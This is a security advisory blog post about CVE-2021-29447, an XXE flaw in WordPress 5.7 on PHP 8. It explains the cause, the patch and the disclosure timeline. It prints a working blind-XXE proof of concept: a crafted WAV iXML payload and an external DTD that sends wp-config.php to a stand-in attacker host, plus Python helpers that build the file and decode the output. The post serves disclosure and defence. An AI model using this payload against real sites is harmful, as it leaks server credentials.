# WordPress 5.7 XXE Vulnerability
BY KARIM EL OUERGHEMMI|APRIL 26, 2021
At SonarSource, we are constantly improving our code analyzers and security rules. We recently improved our PHP security engine to [detect more OWASP Top 10 and CWE Top 25 issue types](https://community.sonarsource.com/t/the-php-security-engine-detects-9-additional-security-problems-related-to-xxe-cors-session-management-csrf-and-more/37986). When testing our new analyzers against some of the most popular open-source PHP projects, an interesting issue was raised in the WordPress codebase.
WordPress is the world’s most popular content management system that is used by [approximately 40% of all websites](https://w3techs.com/technologies/overview/content_management). This wide adoption makes it one of the top targets for cyber criminals. Its code is heavily reviewed by the security community and by bug bounty hunters that get paid for reporting security issues. Critical code issues rarely slip through their hands.
In this blog post, we investigate the new vulnerability reported by our analyzer. We explain its root cause, which is related to PHP 8, and demonstrate how an attacker could leverage it to undermine the security of a WordPress installation. We responsibly disclosed the code vulnerability to the WordPress security team, who fixed it in version 5.7.1 and assigned [CVE-2021-29447](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447).
[SonarCloud Vulnerability Report](https://sonarcloud.io/project/issues?id=SonarSourceResearch_wordpress.5.7.0&open=AXj-5hkLeJDscEr_Xkyb&resolved=false&types=VULNERABILITY)
## Impact
The detected code vulnerability is an authenticated XML External Entity (XXE) injection. It affects WordPress versions prior to 5.7.1 and can allow remote attackers to achieve:
- **Arbitrary File Disclosure**: the content of any file on the host’s file system could be retrieved, e.g. *wp-config.php* which contains sensitive data such as database credentials.
- **Server-Side Request Forgery (SSRF)**: HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.
The vulnerability can be exploited only when WordPress is running on PHP 8. Additionally, the attacker needs permission to upload media files. On a standard WordPress installation, this translates to having *author* privileges. However, combined with another vulnerability or a plugin that allows visitors to upload media files, it could be exploited with lower privileges.
WordPress released a [security & maintenance update](https://wordpress.org/support/wordpress-version/version-5-7-1/) on April 14th, 2021 to patch the vulnerability and to protect its users.
## Technical Details
In this section we take a closer look at the technical details of the vulnerability. First we briefly revisit what an XXE vulnerability is. Following that, we dive into the vulnerability our analyzer reported in the WordPress core by looking at where it is located in the code, and why it became exploitable again in PHP 8 even though there was an effort to prevent such vulnerabilities in the affected code lines. Finally, we demonstrate how it can be exploited by attackers by using specially crafted input to extract the *wp-config.php* file, and how the vulnerability is prevented.
### XML External Entity (XXE) Vulnerabilities
XML offers the possibility to define custom entities that can be reused throughout a document. This can, for example, be used to avoid duplication. The following code defines an entity myEntity for further usage.
```
<!DOCTYPE myDoc [ <!ENTITY myEntity "a long value" > ]>
<myDoc>
<foo>&myEntity;</foo>
<bar>&myEntity;</bar>
</myDoc>
```
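As a small illustration of the substitution step, the following Python sketch parses the document above with the standard library's `xml.etree.ElementTree` and collects the text of each child element. Python is used here only for demonstration, and the helper name `element_texts` is made up for this example. WordPress itself parses XML through PHP and *Libxml2*.

```python
import xml.etree.ElementTree as ET

# The sample document from above: one internal entity, referenced twice.
DOCUMENT = """<!DOCTYPE myDoc [ <!ENTITY myEntity "a long value" > ]>
<myDoc>
<foo>&myEntity;</foo>
<bar>&myEntity;</bar>
</myDoc>"""


def element_texts(xml_source: str) -> dict:
    """Parse the document and return each child element's text, keyed by tag."""
    root = ET.fromstring(xml_source)
    return {child.tag: child.text for child in root}


if __name__ == "__main__":
    # Both <foo> and <bar> end up with the entity's replacement text.
    print(element_texts(DOCUMENT))
```

Both references to the entity are replaced by its value during parsing, so the application never sees the `&myEntity;` references themselves.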
The value of defined entities can also stem from an external source referenced by a *URI*. In this case, they are called external entities:
```
<!DOCTYPE myDoc [ <!ENTITY myExternalEntity SYSTEM "http://…..com/value.txt" > ]>
<myDoc>
<foo>&myExternalEntity;</foo>
</myDoc>
```
XXE attacks misuse this feature. They are possible when a loosely configured XML parser is run on user-controlled content. Loosely configured usually means that all entities are substituted with their corresponding value in the result. For example, in the last sample, if an attacker supplied file:///var/www/wp-config.php as the URI and were able to view the result of the parsed XML, they would successfully leak sensitive file content. However, the result of parsed XML is not always displayed back to the user, which is the case for the WordPress vulnerability described in this post. As we will see later, there are ways to work around that.
This is the main idea and mechanism behind XXE ([learn more in our rule database](https://rules.sonarsource.com/php/RSPEC-2755)). Besides sensitive file disclosure, XXE can also have other impacts, such as *Server-Side Request Forgery* (to retrieve the content of external entities, a request has to be made, [S5144](https://rules.sonarsource.com/php/RSPEC-5144)), and *Denial of Service* (entities could reference other entities resulting in a possible exponential growth during substitution a.k.a. [Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack)).
### XXE in WordPress
WordPress has a Media Library that enables authenticated users to upload media files that can then be used in their blog posts. To extract meta information from these media files, e.g., artist name or title, WordPress uses the *getID3* library. Some of this metadata is parsed in XML form. Here, our analyzer reported a possible XXE vulnerability (line 730).
**wp-includes/ID3/getid3.lib.php**
```
723 if (PHP_VERSION_ID < 80000) {
724
725 // This function has been deprecated in PHP 8.0 because in libxml 2.9.0, external entity loading is
726 // disabled by default, so this function is no longer needed to protect against XXE attacks.
728 $loader = libxml_disable_entity_loader(true);
729 }
730 $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);
```
The simplexml_load_string() function used here is a PHP function that parses the string passed as its first parameter as XML. The underlying XML parser (PHP relies on *Libxml2*) can be configured with flags passed in the third argument.
The comments in the shown piece of code are of particular interest as they mention protection against XXE. Reading them while reviewing this finding of a static code analyzer might raise the suspicion that it is a false-positive, and that correct precautions have been taken to avoid the vulnerability. But, is it? (*Spoiler: no*)
To better understand the code and the surrounding comments, it is useful to look at its history. In 2014, an XXE vulnerability was fixed in [WordPress 3.9.2](https://wordpress.org/news/2014/08/wordpress-3-9-2/). This is the main reason the call libxml_disable_entity_loader(true) was added at that point. The PHP function libxml_disable_entity_loader() configures the XML parser to disable external entity loading.
Recently, with the release of PHP 8, the code was [slightly adapted](https://github.com/WordPress/WordPress/commit/03eba7beb2f5b96bd341255eaa30d6b612e62507) to accommodate the deprecation of the libxml_disable_entity_loader() function, calling it only if the running PHP version is older than 8. This function was deprecated because newer PHP versions use *Libxml2* v2.9+, which disables external entity fetching **by default**.
Now the subtlety in the code we are looking at is that simplexml_load_string() is not called with default configuration. Even though the name might not suggest it, the flag LIBXML_NOENT **enables** entity substitution. Surprisingly, *NOENT* in this case means that no entities will be left in the result, and thus external entities will be fetched and substituted. As a result, exploiting the XXE vulnerability that was fixed in [WordPress 3.9.2](https://wordpress.org/news/2014/08/wordpress-3-9-2/) was made possible again on WordPress instances running on PHP 8.
### Exploitation
To exploit the described vulnerability it is necessary to understand if and how user-controlled data can reach the point where it gets parsed as XML as part of the $XMLstring variable in:
**wp-includes/ID3/getid3.lib.php**
```
721 public static function XML2array($XMLstring) {
…
730 $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);
```
WordPress uses *getID3* to ease extraction of this metadata when files are uploaded to its media library. Investigation of the getID3 library revealed that the string being parsed at that point is the [*iXML*](http://www.ixml.info/) chunk of a wave audio file when its metadata gets analyzed.
**wp-includes/ID3/module.audio-video.riff.php**
```
426 if (isset($thisfile_riff_WAVE['iXML'][0]['data'])) {
427 // requires functions simplexml_load_string and get_object_vars
428 if ($parsedXML = getid3_lib::XML2array($thisfile_riff_WAVE['iXML'][0]['data'])) {
```
WordPress does allow uploading wave audio files, and extracts their metadata with the wp_read_audio_metadata() function (which relies on *getID3*). Thus, by uploading a crafted wave file, malicious XML can be injected and parsed. A minimal file that has the necessary structure to be handled as wave and that contains an attack payload in the *iXML* chunk can be created with the following content:
```
RIFFXXXXWAVEiXMLBBBB_OUR_PAYLOAD_
```
(*BBBB* being four bytes representing the length of the XML payload in little endian.)
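The byte layout can be sketched in Python as follows. This is a minimal illustration, not the original proof of concept. It assumes the standard RIFF chunk layout (a four-byte chunk ID, then a four-byte little-endian size, then the data, padded to an even length), and it assumes that *XXXX* is the usual RIFF size field, which the text above does not spell out. The function name `build_wav_with_ixml` and the harmless placeholder payload are made up for this example.

```python
import struct


def build_wav_with_ixml(xml_payload: bytes) -> bytes:
    """Return a bare-bones RIFF/WAVE container holding a single iXML chunk."""
    # Chunk header: four-byte ID followed by the payload length (little endian).
    ixml_chunk = b"iXML" + struct.pack("<I", len(xml_payload)) + xml_payload
    if len(xml_payload) % 2:
        # RIFF chunks are word-aligned; odd-sized data gets one pad byte.
        ixml_chunk += b"\x00"
    body = b"WAVE" + ixml_chunk
    # Assumption: XXXX is the RIFF size, i.e. everything after the first 8 bytes.
    return b"RIFF" + struct.pack("<I", len(body)) + body


if __name__ == "__main__":
    # Harmless placeholder instead of an attack payload.
    wav = build_wav_with_ixml(b"<r/>")
    print(wav)
```

Computing both length fields from the payload avoids mismatches that could make a parser skip or truncate the chunk.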
### Blind XXE
When an attacker injects a payload with the described strategy, the result of the parsed XML is not displayed in the user interface. Thus, to extract the content of a sensitive file (e.g., *wp-config.php*), the attacker must rely on a blind XXE technique (also called *out-of-band* XXE). This is similar to the technique described in [our previous blog post](https://blog.sonarsource.com/shopware-php-object-instantiation-to-blind-xxe) about exploiting Shopware. The basic idea is this:
- A first external entity (e.g., %data) is created whose value will be substituted with the content of the file.
- Another external entity is created whose URI is set to “*http://attacker_domain.com/%data;*”. Note the value of the URI contains the first entity which will be substituted.
- When resolving the second entity, the parser will make a request to “*http://attacker_domain.com/_SUBSTITUTED_data*”, making the content of the file visible in the logs of the web server.
To make the URI of the external entity dependent on the value of another substituted entity, we use parameter entities and an external DTD. Furthermore, we make use of the php:// stream wrapper to compress and encode the content of the file. Putting things together, the following would lead to the extraction of the sensitive *wp-config.php* file:
**payload.wav**
```
RIFFXXXXWAVEiXMLBBBB<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
```
(*BBBB* being four bytes representing the length of the XML payload in little endian.)
**xxe.dtd**
```
<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">
```
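On the receiving side, the value that shows up in the web server logs still has to be decoded. The following Python sketch reverses the filter chain used in *xxe.dtd*. It assumes that PHP's zlib.deflate filter emits a raw DEFLATE stream without a zlib header, and that some log or query-string parsers may have turned `+` characters into spaces. Both function names are hypothetical, and `encode_like_filter_chain` exists only to produce test input.

```python
import base64
import zlib


def decode_exfiltrated(value: str) -> bytes:
    """Reverse base64 encoding and raw DEFLATE compression of a logged value."""
    # Assumption: a query-string parser may have replaced '+' with a space.
    b64 = value.replace(" ", "+")
    compressed = base64.b64decode(b64)
    # Negative wbits tells zlib to expect a raw DEFLATE stream (no header).
    return zlib.decompress(compressed, -zlib.MAX_WBITS)


def encode_like_filter_chain(content: bytes) -> str:
    """Mimic zlib.deflate followed by convert.base64-encode, for testing only."""
    compressor = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    raw = compressor.compress(content) + compressor.flush()
    return base64.b64encode(raw).decode("ascii")


if __name__ == "__main__":
    sample = encode_like_filter_chain(b"<?php // placeholder file content")
    print(decode_exfiltrated(sample))
```

Compressing before encoding keeps the exfiltrated value short, which matters because the whole file content has to fit into a single request URI.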
## Patch
WordPress patched the vulnerability in [version 5.7.1](https://wordpress.org/support/wordpress-version/version-5-7-1/) by calling the libxml_disable_entity_loader() function again on all PHP versions, including PHP 8, where the function is deprecated. To avoid PHP deprecation warnings, the PHP error suppression operator @ was added to the call.
**wp-includes/ID3/getid3.lib.php**
```
721 public static function XML2array($XMLstring) {
…
727 $loader = @libxml_disable_entity_loader(true);
728 $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);
```
An alternative to reintroducing the call to the deprecated function would have been to use PHP’s [libxml_set_external_entity_loader()](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php) function. This is the recommended way according to the PHP documentation. It also allows more granular control over the external entity loader in case specific resources need to be loaded. This is, of course, only necessary if entity substitution is really required in PHP 8.
## Timeline
| Date | What |
| ---------- | ------------------------------------------------------- |
| 04.02.2021 | We report the vulnerability with PoC on HackerOne |
| 05.02.2021 | WordPress acknowledges receipt of report |
| 01.03.2021 | WordPress updates us about triage and a fix in progress |
| 08.03.2021 | WordPress informs us about upcoming security release |
| 14.04.2021 | WordPress releases version 5.7.1 |
## Summary
In this blog post we looked at an interesting XXE vulnerability we discovered in the most popular content management system, WordPress. It allows authenticated attackers to leak sensitive files from the host server which can lead to a full compromise. We showed how this type of vulnerability works and how attackers can exploit it by using blind XXE techniques. Further, we learned about a related pitfall in PHP 8 code and how developers can prevent this type of code vulnerability in their own applications. We would like to thank the WordPress team for a great collaboration and a quick resolution with a new patch release.